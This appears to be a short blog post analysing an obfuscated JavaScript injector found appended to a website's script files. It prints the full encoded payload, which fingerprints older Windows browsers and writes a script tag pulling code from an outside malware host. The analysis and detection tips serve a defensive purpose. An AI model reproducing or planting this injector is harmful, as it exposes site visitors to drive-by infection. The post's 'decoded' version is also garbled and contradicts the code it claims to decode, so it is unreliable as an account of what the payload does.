Malware Javascript

One of the biggest online advertisement contest web side uses a kind of web2.0 javascript pack. I have found a malware javascript code at the end of all included js files.Here is the code below, let's start analysis of this code.

function(){varsmtbX='>76>61r>20a>3d>22Scri>70tEngi>6ee>22>2c>62>3d>22Versi>6f>6e()>22>2cj>3d>22>22>2c>75>3d>6eaviga>74>6fr>2eus>65>72>41g>65nt>3bi>66>28(>75>2e>69ndexOf(>22Win>22)>3e0)>26>26(u>2ein>64ex>4ff(>22NT>20>36>22)>3c0)>26>26(do>63ument>2ec>6fokie>2ein>64>65x>4ff(>22miek>3d1>22)>3c0)>26>26(typ>65>6f>66>28zr>76zts)>21>3dty>70eo>66(>22A>22)))>7bzrv>7ats>3d>22A>22>3b>65>76>61>6c(>22>69f(win>64ow>2e>22+a+>22>29j>3dj+>22>2ba>2b>22M>61jor>22>2bb+a+>22Minor>22+b+a+>22>42ui>6c>64>22>2bb+>22>6a>3b>22)>3bdocument>2e>77rite>22>3cscri>70>74>20sr>63>3d>2f>2fgu>6dblar>2ecn>2frss>2f>3f>69>64>3d>22>2bj>2b>22>3e>3c>5c>2f>73c>72ipt>3e>22)>3b>7d';var ujt2o=unescape(smtbX.replace(/>/g,'%'));eval(ujt2o)})(); -->

there is a replace at the end of code, it says replace ">" with "g" so i have replaced it and then urldecoded the code =>

33function(){var mtbX='vara="ScriptEngine",b="Version)",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT6")<0)&&(document.cookie.indexof("miek=1")<0)&&(typeof(zrvzts)!=typeof("a"))){zrvzts="a";eval("if(window." j="j" scriptsrc=" id=""><\/script>");}';varujt2o=unescape(smtbX.replace(/%/g,'%'));eval(ujt2o)})();

Malicious code make a request to gumblar.cnn/rss/?id= "j" . I have tried this site with standart windows xp system without any protection and it exploited my pdf viewer and then try to download some malware files.In my opinio this code belongs to an virus payload. Somehowe this virus infected the web server and find js files to add its payload to them.

"replace" function in javascript may be a part of malicious script. Websense and other webfilter tools web robots parse these js files and make a signature based search for malicious attempts. If you wanna do it with yourself web mirroring and string search also works.